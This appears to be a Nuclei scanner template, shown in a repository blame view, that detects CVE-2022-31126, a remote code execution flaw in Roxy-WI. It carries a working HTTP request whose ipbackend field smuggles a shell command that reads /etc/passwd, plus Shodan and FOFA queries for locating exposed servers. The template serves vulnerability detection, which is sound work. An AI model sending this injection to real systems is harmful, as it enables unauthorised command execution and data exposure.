nuclei-templates/http/cves/2022/CVE-2022-31126.yaml

59 lines
2.1 KiB
YAML
Raw Permalink Normal View History

2022-08-12 16:51:23 +00:00
id: CVE-2022-31126
info:
name: Roxy-WI <6.1.1.0 - Remote Code Execution
2022-08-12 16:51:23 +00:00
author: DhiyaneshDK
severity: critical
description: |
Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
2023-09-06 11:59:08 +00:00
remediation: Users are advised to upgrade to latest version.
2022-08-12 16:51:23 +00:00
reference:
- http://packetstormsecurity.com/files/167805/Roxy-WI-Remote-Command-Execution.html
- https://www.cve.org/CVERecord?id=CVE-2022-31137
- https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-mh86-878h-43c9
- https://nvd.nist.gov/vuln/detail/CVE-2022-31137
- https://nvd.nist.gov/vuln/detail/CVE-2022-31126
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-31126
cwe-id: CWE-74
epss-score: 0.84229
epss-percentile: 0.98401
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:roxy-wi:roxy-wi:*:*:*:*:*:*:*:*
2022-08-12 16:51:23 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: roxy-wi
product: roxy-wi
shodan-query:
- http.html:"Roxy-WI"
- http.html:"roxy-wi"
2024-05-31 19:23:20 +00:00
fofa-query: body="roxy-wi"
2024-01-14 09:21:50 +00:00
tags: cve2022,cve,rce,unauth,roxy,packetstorm,roxy-wi
2022-08-12 16:51:23 +00:00
http:
2022-08-12 16:51:23 +00:00
- raw:
- |
POST /app/options.py HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Origin: {{BaseURL}}
Referer: {{BaseURL}}/app/login.py
2022-08-13 00:12:49 +00:00
alert_consumer=1&serv=127.0.0.1&ipbackend=";cat+/etc/passwd+##&backend_server=127.0.0.1
2022-08-12 16:51:23 +00:00
matchers-condition: and
matchers:
2022-08-13 00:12:49 +00:00
- type: regex
2022-08-12 16:51:23 +00:00
part: body
2022-08-13 00:12:49 +00:00
regex:
- "root:.*:0:0:"
2022-08-12 16:51:23 +00:00
- type: status
status:
- 200
# digest: 490a004630440220156a32c08579a4ceeef3d9260ddc2ec8857ce6b50414ec4a8e3072914c771a4002200881c2fb9c2fc0a2d32b6467adc64aeb6ea666554ce72ec3ee67b8be7453c1f2:922c64590222798bb761d5b6d8e72950